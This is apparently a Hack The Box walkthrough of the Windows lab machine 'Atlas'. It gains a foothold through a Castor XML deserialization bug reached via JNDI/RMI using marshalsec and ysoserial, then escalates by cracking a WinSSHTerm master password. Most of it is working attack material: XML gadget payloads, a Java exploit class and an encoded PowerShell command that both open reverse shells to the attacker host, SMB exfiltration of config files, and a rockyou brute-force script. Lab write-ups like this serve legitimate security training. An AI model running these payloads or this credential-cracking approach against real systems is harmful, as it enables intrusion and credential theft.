HTB | Atlas

Machine - https://app.hackthebox.com/machines/Atlas

NMAP

└─$ nmap -sC -sV -p 21,22,3389,8080 10.129.238.8 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-01-23 22:26 IST
Nmap scan report for 10.129.238.8
Host is up (0.33s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           FileZilla ftpd 1.7.2
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp        22851463 Jul 03  2023 atlas-pilot-1.0.0-SNAPSHOT.jar
|_-r--r--r-- 1 ftp ftp          586379 Jul 03  2023 atlas_generator.zip
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=filezilla-server self signed certificate
| Not valid before: 2023-06-30T15:35:45
|_Not valid after:  2024-06-30T15:40:45
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: ATLAS
|   NetBIOS_Domain_Name: ATLAS
|   NetBIOS_Computer_Name: ATLAS
|   DNS_Domain_Name: ATLAS
|   DNS_Computer_Name: ATLAS
|   Product_Version: 10.0.19041
|_  System_Time: 2026-01-23T16:56:43+00:00
|_ssl-date: 2026-01-23T16:56:53+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=ATLAS
| Not valid before: 2025-10-08T22:02:25
|_Not valid after:  2026-04-09T22:02:25
8080/tcp open  http          Apache Tomcat (language: en)
|_http-title: Site doesn't have a title (text/html;charset=UTF-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 29.67 seconds

Port 21

We can login as anonymous

└─$ ftp 10.129.238.8                                                                                                                    
Connected to 10.129.238.8.
220-FileZilla Server 1.7.2
220 Please visit <https://filezilla-project.org/>
Name (10.129.238.8:anurag): anonymous
331 Please, specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

There are two files

ftp> ls
229 Entering Extended Passive Mode (|||50328|)
150 Starting data transfer.
-r--r--r-- 1 ftp ftp        22851463 Jul 03  2023 atlas-pilot-1.0.0-SNAPSHOT.jar
-r--r--r-- 1 ftp ftp          586379 Jul 03  2023 atlas_generator.zip
226 Operation successful
ftp> 

Port 8080

There is a web page, which ask us for employee data in XML format.

When we upload a demo XML file, we get the following output:

Foothold/ Shell

Source Code Analysis

Extracting the Zip file we got from the FTP server, it seems that this is the web application which we saw on Port 8080

┌──(anurag㉿anurag)-[~/htb/Atlas/atlas_generator]
└─$ tree .                                            
.
├── atlas_generator.zip
├── build.gradle
├── gradle
│   └── wrapper
│       ├── gradle-wrapper.jar
│       └── gradle-wrapper.properties
├── gradlew
├── gradlew.bat
├── mvnw
├── mvnw.cmd
├── pom.xml
├── settings.gradle
└── src
    └── main
        ├── java
        │   └── com
        │       └── example
        │           └── uploadingfiles
        │               ├── Client.java
        │               ├── Employee.java
        │               ├── FileUploadController.java
        │               └── UploadingFilesApplication.java
        └── resources
            ├── application.properties
            ├── static
            │   ├── 59f86e9a43e6f89908a4f0b948915bef.png
            │   ├── 7363804265c4c8b8ca3f6e25a3e432c6.png
            │   ├── e43471533678310ee5007162c051d5eb.png
            │   ├── mapping.xml
            │   ├── reset-fonts-grids.css
            │   ├── resume.css
            │   └── rocket.png
            └── templates
                ├── srt-resume.html
                ├── uploadForm.html
                └── xmlTemplate.html

12 directories, 25 files

In pom.xml we can see the dependency and their version, one that caught my attention is Castor 1.4.1

└─$ cat pom.xml         
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="<http://maven.apache.org/POM/4.0.0>" xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>"
        xsi:schemaLocation="<http://maven.apache.org/POM/4.0.0> <https://maven.apache.org/xsd/maven-4.0.0.xsd>">
        <modelVersion>4.0.0</modelVersion>
        <parent>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-parent</artifactId>
                <version>2.7.0</version>
                <relativePath/> <!-- lookup parent from repository -->
        </parent>
        <groupId>com.example</groupId>
        <artifactId>atlas-pilot</artifactId>
        <version>1.0.0-SNAPSHOT</version>
        <name>atlas-hr-generator</name>
        <description>Atlas HR Sheet Generator</description>

        <properties>
                <java.version>11</java.version>
        </properties>

        <dependencies>
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-thymeleaf</artifactId>
                </dependency>
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-web</artifactId>
                </dependency>

                <dependency>
                        <groupId>org.codehaus.castor</groupId>
                        <artifactId>castor-xml</artifactId>
                        <version>1.4.1</version>
                </dependency>

                <dependency>
                        <groupId>org.springframework</groupId>
                        <artifactId>spring-oxm</artifactId>
                        <version>4.1.5.RELEASE</version>
                </dependency>

                <dependency>
                        <groupId>commons-beanutils</groupId>
                        <artifactId>commons-beanutils</artifactId>
                        <version>1.9.2</version>
                </dependency>

        </dependencies>

        <build>
                <plugins>
                        <plugin>
                                <groupId>org.springframework.boot</groupId>
                                <artifactId>spring-boot-maven-plugin</artifactId>
                        </plugin>
                </plugins>
        </build>

</project>

In the FileUploadController source code, we can find the endpoints of the application, the endpoint /genereateTemplate is interesting:

It seems that this endpoint calls the method createXML from the Client class and will generate a xml template when we call it.

Marshall

If we take a closer look at Client.java, we can notice that the xml file is created by using the Castor Marshaller library and If we call /genereateTemplate endpoint we can see that the employee_template.xml is created on the ftp server

└─$ ftp 10.129.238.8                                                                                                                    
Connected to 10.129.238.8.
220-FileZilla Server 1.7.2
220 Please visit <https://filezilla-project.org/>
Name (10.129.238.8:anurag): anonymous
331 Please, specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||50040|)
150 Starting data transfer.
-r--r--r-- 1 ftp ftp        22851463 Jul 03  2023 atlas-pilot-1.0.0-SNAPSHOT.jar
-r--r--r-- 1 ftp ftp          586379 Jul 03  2023 atlas_generator.zip
-r--r--r-- 1 ftp ftp            1310 Jan 23 17:26 employee_template.xml

And when we upload this file to the webserver we get the following output

Unmarshall

In the FileUploadController we can also notice that the uploaded xml file will be handover to the parseXML method.

And in the ParseXML method from the Client.java The file will be unmarshalled back into the employee class.

💡 Refer https://dzone.com/articles/introduction-to-jaxb-20 for a better understanding of Marshalling and Unmarshalling

Java Deserialization Attacks and JNDI

When searching for java marshale exploit we found https://github.com/mbechler/marshalsec

But to use this we will required java 8, let’s spin one docker instance for java 8

FROM maven:3.9.9-eclipse-temurin-8

WORKDIR /opt/marshalsec

RUN git clone <https://github.com/mbechler/marshalsec.git> .

RUN mvn clean package -DskipTests

ENTRYPOINT ["bash"]

This will give us

• Java 8

• Maven

• marshalsec built and ready

• interactive shell by default

Now we build the image

sudo docker build -t marshalsec-java8 .

Now let’s run

└─$ sudo docker run -it --rm  -p 1389:1389  marshalsec-java8 
root@e8f04c2ec8b5:/opt/marshalsec# java -version
openjdk version "1.8.0_452"
OpenJDK Runtime Environment (Temurin)(build 1.8.0_452-b09)
OpenJDK 64-Bit Server VM (Temurin)(build 25.452-b09, mixed mode)
root@e8f04c2ec8b5:/opt/marshalsec# ls target
archive-tmp  classes  generated-sources  generated-test-sources  marshalsec-0.0.3-SNAPSHOT-all.jar  marshalsec-0.0.3-SNAPSHOT.jar  maven-archiver  maven-status  test-classes
root@e8f04c2ec8b5:/opt/marshalsec# 

Castor Gaget Chain

With the following command, we notice that there are two gadgets available with Castor

root@e8f04c2ec8b5:/opt/marshalsec# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor
No gadget type specified, available are [SpringAbstractBeanFactoryPointcutAdvisor, C3P0WrapperConnPool]
root@e8f04c2ec8b5:/opt/marshalsec# 

so we are going to try the first one, to get an output we need to define a URL, remembering back to the log4shell vulnerability we can go and try to define a LDAP server

root@e8f04c2ec8b5:/opt/marshalsec# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor SpringAbstractBeanFactoryPointcutAdvisor ldap://10.10.17.46:1389/a

which gives us the following payload

<x xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>" xmlns:java="<http://java.sun.com>" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>ldap://10.10.17.46:1389/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>ldap://10.10.17.46:1389/a</shareable-resource></bean-factory></x>

we also start a malicious JNDI / LDAP server via marschalsec

root@e8f04c2ec8b5:/opt/marshalsec# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "<http://10.10.17.46:8888/#Exploit>"
Listening on 0.0.0.0:1389

Let’s make Exploit.class

└─$ cat Exploit.java 
public class Exploit {
    static {
        try {
            String cmd =
                "powershell -NoP -NonI -W Hidden -Exec Bypass -Command " +
                "\\"$client = New-Object System.Net.Sockets.TCPClient('10.10.17.46',4444);" +
                "$stream = $client.GetStream();" +
                "[byte[]]$bytes = 0..65535|%{0};" +
                "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){" +
                "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);" +
                "$sendback = (iex $data 2>&1 | Out-String );" +
                "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';" +
                "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);" +
                "$stream.Write($sendbyte,0,$sendbyte.Length);" +
                "$stream.Flush()}" +
                "\\"";

            Runtime.getRuntime().exec(cmd);
        } catch (Exception e) {}
    }
}

└─$ sudo docker cp Exploit.java e8f04c2ec8b5:/opt/marshalsec/
Successfully copied 2.56kB to e8f04c2ec8b5:/opt/marshalsec/

#on docker
root@e8f04c2ec8b5:/opt/marshalsec# ls Exploit.java 
Exploit.java
root@e8f04c2ec8b5:/opt/marshalsec# javac Exploit.java
root@e8f04c2ec8b5:/opt/marshalsec# ls Exploit.class 
Exploit.class
root@e8f04c2ec8b5:/opt/marshalsec#

#on machine
└─$ sudo docker cp e8f04c2ec8b5:/opt/marshalsec/Exploit.class .
[sudo] password for anurag: 
Successfully copied 2.56kB to /home/anurag/htb/Atlas/.
┌──(anurag㉿anurag)-[~/htb/Atlas]
└─$ ls Exploit.class 
Exploit.class

Upload

now we only need to prepare the xml template with our payload, for this we need to choose a tag which will be parsed from the code, so we change the "x" to "name" and delete the original name tag from our payload and upload the following xml

└─$ cat employee_template.xml
<?xml version="1.0" encoding="UTF-8"?>
<Employee id="101">
    <name xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>" xmlns:java="<http://java.sun.com>" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>ldap://10.10.17.46:1389/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>ldap://10.10.17.46:1389/a</shareable-resource></bean-factory></name>
    <talent-titles>Web Design</talent-titles>
    <talent-titles>Interface Design</talent-titles>
    <talent-titles>Project Direction</talent-titles>
    <talent-textes>Assertively exploit wireless initiatives rather than synergistic core competencies.</talent-textes>
    <talent-textes>Credibly streamline mission-critical value with multifunctional functionalities.</talent-textes>
    <talent-textes>Proven ability to lead and manage a wide variety of design and development projects in team and independent situations.</talent-textes>
    <skills>XHTML</skills>
    <skills>CSS</skills>
    <skills>Javascript</skills>
    <skills>Jquery</skills>
    <skills>PHP</skills>
    <skills>CVS / Subversion</skills>
    <skills>OS X</skills>
    <skills>Windows XP/Vista</skills>
    <skills>Linux</skills>
    <profile>Progressively evolve cross-platform ideas before impactful infomediaries. Energistically visualize tactical initiatives before cross-media catalysts for change.</profile>
    <phone>(313) - 867-5309</phone>
    <email>jonathan@doe.com</email>
    <education-text>Dual Major, Economics and English - 4.0 GPA</education-text>
    <education-title>Indiana University - Bloomington, Indiana</education-title>
    <title>WEB DESIGNER, DIRECTOR</title>
</Employee>

as we can see, this will hit our LDAP server but unfortunately the redirect to our webserver will not be executed

root@e8f04c2ec8b5:/opt/marshalsec# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "<http://10.10.17.46:8888/#Exploit>"
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to <http://10.10.17.46:8888/Exploit.class>

#HTTP server
└─$ python3 -m http.server 8888                                                                          
Serving HTTP on 0.0.0.0 port 8888 (<http://0.0.0.0:8888/>) ...

But at least we have a confirmed SSRF

SSRF to RCE via RMI

When looking for java SSRf JNDi I found some article that uses RMI instead of LDAP ( Since redirection is not working with LDAP)

• https://infosecwriteups.com/jndi-injection-series-rmi-vector-insecure-deserialization-9b7a4b524d1d

• https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/

We'll regenerate our SSRF payload using the RMI scheme and replace it in our generated template again.

root@0f5ada6b6a50:/opt/marshalsec# java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Castor SpringAbstractBeanFactoryPointcutAdvisor rmi://10.10.17.46/a

<x xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>" xmlns:java="<http://java.sun.com>" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>rmi://10.10.17.46/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>rmi://10.10.17.46/a</shareable-resource></bean-factory></x>
root@0f5ada6b6a50:/opt/marshalsec# 

└─$ cat employee_template.xml
<?xml version="1.0" encoding="UTF-8"?>
<Employee id="101">
    <name xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>" xmlns:java="<http://java.sun.com>" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>rmi://10.10.17.46/a</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>rmi://10.10.17.46/a</shareable-resource></bean-factory></name>
    <talent-titles>Web Design</talent-titles>
    <talent-titles>Interface Design</talent-titles>
    <talent-titles>Project Direction</talent-titles>
    <talent-textes>Assertively exploit wireless initiatives rather than synergistic core competencies.</talent-textes>
    <talent-textes>Credibly streamline mission-critical value with multifunctional functionalities.</talent-textes>
    <talent-textes>Proven ability to lead and manage a wide variety of design and development projects in team and independent situations.</talent-textes>
    <skills>XHTML</skills>
    <skills>CSS</skills>
    <skills>Javascript</skills>
    <skills>Jquery</skills>
    <skills>PHP</skills>
    <skills>CVS / Subversion</skills>
    <skills>OS X</skills>
    <skills>Windows XP/Vista</skills>
    <skills>Linux</skills>
    <profile>Progressively evolve cross-platform ideas before impactful infomediaries. Energistically visualize tactical initiatives before cross-media catalysts for change.</profile>
    <phone>(313) - 867-5309</phone>
    <email>jonathan@doe.com</email>
    <education-text>Dual Major, Economics and English - 4.0 GPA</education-text>
    <education-title>Indiana University - Bloomington, Indiana</education-title>
    <title>WEB DESIGNER, DIRECTOR</title>
</Employee>

Ysoserial

Now we can use the ysoserial tool to generate our RCE payload. FOr running this we will use docker since it it require old dependencied

FROM maven:3.9.9-eclipse-temurin-8

WORKDIR /opt/ysoserial

RUN git clone <https://github.com/frohoff/ysoserial.git> .

RUN mvn -q -DskipTests package

ENTRYPOINT ["bash"]

Now let’s build and run

sudo docker build -t ysoserial-java8 .

└─$ sudo docker run -it --rm  -p 1099:1099 ysoserial-java8  
root@e3cfda9cd8ca:/opt/ysoserial# 

To verify a simple RCE first let’s set the payload to ping our machine.

root@e3cfda9cd8ca:/opt/ysoserial# java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'ping 10.10.17.46'
* Opening JRMP listener on 1099

Once we upload our XML template again we can see we get a call back right away with code execution.

root@e3cfda9cd8ca:/opt/ysoserial# java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'ping 10.10.17.46'
* Opening JRMP listener on 1099
Have connection from /10.129.238.8:53724
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection

#on listner
└─$ sudo tcpdump -i tun0 icmp                               
[sudo] password for anurag: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:17:01.338404 IP 10.129.238.8 > 10.10.17.46: ICMP echo request, id 1, seq 1, length 40
11:17:01.338429 IP 10.10.17.46 > 10.129.238.8: ICMP echo reply, id 1, seq 1, length 40
11:17:02.341015 IP 10.129.238.8 > 10.10.17.46: ICMP echo request, id 1, seq 2, length 40
11:17:02.341049 IP 10.10.17.46 > 10.129.238.8: ICMP echo reply, id 1, seq 2, length 40
11:17:03.344252 IP 10.129.238.8 > 10.10.17.46: ICMP echo request, id 1, seq 3, length 40
11:17:03.344309 IP 10.10.17.46 > 10.129.238.8: ICMP echo reply, id 1, seq 3, length 40
11:17:04.345134 IP 10.129.238.8 > 10.10.17.46: ICMP echo request, id 1, seq 4, length 40
11:17:04.345169 IP 10.10.17.46 > 10.129.238.8: ICMP echo reply, id 1, seq 4, length 40

Now that we've confirmed we have RCE we can now get a reverse shell. Simply changing the command is all that is required at this point since the generated template will still point to our RMI listener.

root@e3cfda9cd8ca:/opt/ysoserial# java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsBeanutils1 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA3AC4ANAA2ACIALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='
* Opening JRMP listener on 1099
Have connection from /10.129.238.8:53897
Reading message...
Sending return with payload for obj [0:0:0, 0]
Closing connection

#on listner
└─$ nc -nlvp 1234                
listening on [any] 1234 ...
connect to [10.10.17.46] from (UNKNOWN) [10.129.238.8] 53903

PS C:\\ftp> 

and we got user.txt

    Directory: C:\\Users\\john\\Desktop

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-ar---        24/01/2026     03:46             34 user.txt   

Priveleage Esclation

WinSSHterm

In the download folder of John we found the WinSSHTerm files

PS C:\\Users> dir john\\Downloads

    Directory: C:\\Users\\john\\Downloads

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        30/06/2023     20:48                WinSSHTerm                                                           
-a----        28/06/2023     14:19        1071137 WinSSHTerm-2.27.0-x64.zip                                            

PS C:\\Users> 

In connections.xml of WinSSHTerm we found the encoded password of admin

PS C:\\Users\\john\\Downloads\\WinSSHTerm\\config> type connections.xml
<?xml version="1.0" encoding="utf-8"?>
<WinSSHTerm Version="1" VerifyKey="j6JcYjnkh7coSbefT7+8jHI+49cgPWAt4XHQ76M6Op0jEzaa+QxpxEk4T9ci9P8wLgORRde5KSb3TmT05AnfWQ==">
    <Node Name="Admin SSH" Type="Connection" Descr="" Username="administrator" Password="VmgFP/ooNadVdVQI5UmW3e5dISTQG8+fQ+wMJHtaATFI46G73XREnctiYbOdPYNR" PrivateKey="" Hostname="127.0.0.1" Port="22" CustomPath="" LoginCmds="" CmdLineArgs="" EnvCol="" CustomId="" cfProt="" cfLogFile="" cfLogLevel="" sAgentFwd="" sTermType="" sLogType="" sLogFileName="" sTCP="" sX11="" sSb="" sCS="" sCSHR="" pSshProxy="disabled" pType="Jump Server" pHost="" pPort="22" pUser="" pPassword="" pPrivKey="" />
</WinSSHTerm>
PS C:\\Users\\john\\Downloads\\WinSSHTerm\\config> 

Let’s download the WinSSHTerm folder and open it on DNSpy to analysis further

PS C:\\Users\\john\\Downloads> net use \\\\10.10.17.46\\share /u:anurag anurag
The command completed successfully.

PS C:\\Users\\john\\Downloads> xcopy WinSSHTerm \\\\10.10.17.46\\share\\WinSSHTerm /E /I /H /Y
WinSSHTerm\\README.txt
WinSSHTerm\\WinSSHTerm.exe
WinSSHTerm\\config\\connections.xml
WinSSHTerm\\config\\key
WinSSHTerm\\config\\layout.xml
WinSSHTerm\\config\\preferences.xml
6 File(s) copied
PS C:\\Users\\john\\Downloads> net use /d \\\\10.10.17.46\\share
\\\\10.10.17.46\\share was deleted successfully.

PS C:\\Users\\john\\Downloads> 

#on machine
└─$ smbserver.py share . -smb2support -username anurag -password anurag
/home/anurag/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.238.8,55796)
[*] AUTHENTICATE_MESSAGE (\\anurag,ATLAS)
[*] User ATLAS\\anurag authenticated successfully
[*] anurag:::aaaaaaaaaaaaaaaa:aecd9c8d4f6a35aadf6675ee70daf637:010100000000000080d1bcf4fa8cdc019ec10cea67327d53000000000100100042007400680061004d006b00700047000300100042007400680061004d006b0070004700020010007800430045007700610054004b006e00040010007800430045007700610054004b006e000700080080d1bcf4fa8cdc01060004000200000008003000300000000000000000000000002000005ce8780125d5f7f48812acab5d07760edd40b2e495d78df5e4ceb7164c2470b10a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310037002e00340036000000000000000000
[*] Connecting Share(1:share)
[*] Disconnecting Share(1:share)
[*] Closing down connection (10.129.238.8,55796)
[*] Remaining connections []

When running the exe it is prompting for master password

To understand this binary better we'll load it into dnSpy

There is AESCrypt method in which there is another function in that method function DecryptWithMP

DecryptWithMP sounds like decrypt with masterpassword, so we are going to investigate the AESCrypt.a Method which is called from this method.

we can see that this method takes a string (A_1) and add a byte array to this and create a rfc289DeriveBytes object out of it and It also uses a hardcoded salt:

It will then use these values to decrypt something, we can add a break point, start the app and try to enter the password "test" to check how this will work, we can see that our provided password will also be salted with some hardcoded value

further we can take a look at the key file, uploading the file to cyberchef and converting it to hex

we can see that this is equal to our array in the code (we just need to exclude the first byte of the key file)

What we also can notice, if we provide a wrong password, the decryption will fail an throw an exception

This should be enough information to write a little brute forcer and try to crack the master password. We can copy and past the most of code out from dnspy and only need to add:

• loading the key file

• strip the first byte

• use a while loop for loading the passwords from rockyou

• loop until we have no decrypt execption

• and check if we can base64 decode

└─$ python3 bruteforce_masterpassword.py
Suffix found in result: b'z9fPzzvhCGlH1Xq4YGzZGEcKZ944DK0c7Agg0PcBfERv0H6VhAIhLOSZvbDj9yVzXydQZsRnjPHgDhwltCAqxQ==t57i.!gd9\\xc3\\xb6\\xc3\\x9ffty\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08'
Found password: hottie101
                                                                                                                                                                                                                                                                              
┌──(venv)─(anurag㉿anurag)-[~/htb/Atlas]
└─$ cat bruteforce_masterpassword.py
from hashlib import pbkdf2_hmac
from Crypto.Cipher import AES
from base64 import b64decode, b64encode

with open("/home/anurag/htb/Atlas/WinSSHTerm/config/key", "rb") as f:
        keyfile = f.read()
        keyfile = keyfile[1:]
        f.close()
prefix = "h7ko%.rdz.WFxsS218LK".encode()
suffix = bytes([116, 53, 55, 105, 46, 33, 103, 100, 57, 195, 182, 195, 159, 102, 116, 121])
salt = bytes([59, 218, 49, 183, 72, 5, 80, 227, 188, 102, 4, 109, 239, 201, 81, 168])

passwords = open("/home/anurag/stuff/rockyou.txt","r", encoding="latin-1").read().split("\\n")

for password in passwords:
        key_iv = pbkdf2_hmac('sha1', prefix + password.encode() + suffix, salt, 1012, dklen = 48)

        key = key_iv[:32]
        iv = key_iv[32:]
        aes = AES.new(key, AES.MODE_CBC, iv)
        result = aes.decrypt(keyfile)
        if suffix in result:
                print(f"Suffix found in result: {result}")
                print(f"Found password: {password}")
                break
                         

with this password we can login and got the administrator password

Since port 22 was open we were able to ssh via administrator

└─$ ssh administrator@10.129.238.8       
The authenticity of host '10.129.238.8 (10.129.238.8)' can't be established.
ED25519 key fingerprint is SHA256:cv3VMLsLX8NKVAn/LRfI5yg7Yae18cwtLQAk0B49bqk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.238.8' (ED25519) to the list of known hosts.
administrator@10.129.238.8's password: 
Microsoft Windows [Version 10.0.19045.6396]
(c) Microsoft Corporation. All rights reserved.
                                               
administrator@ATLAS C:\\Users\\Administrator>    

and got the root.txt

                                                  
 Directory of C:\\Users\\Administrator\\Desktop      
                                                  
03/07/2023  10:49    <DIR>          .             
03/07/2023  10:49    <DIR>          ..            
24/01/2026  11:52                34 root.txt      
               1 File(s)             34 bytes     
               2 Dir(s)   7,540,326,400 bytes free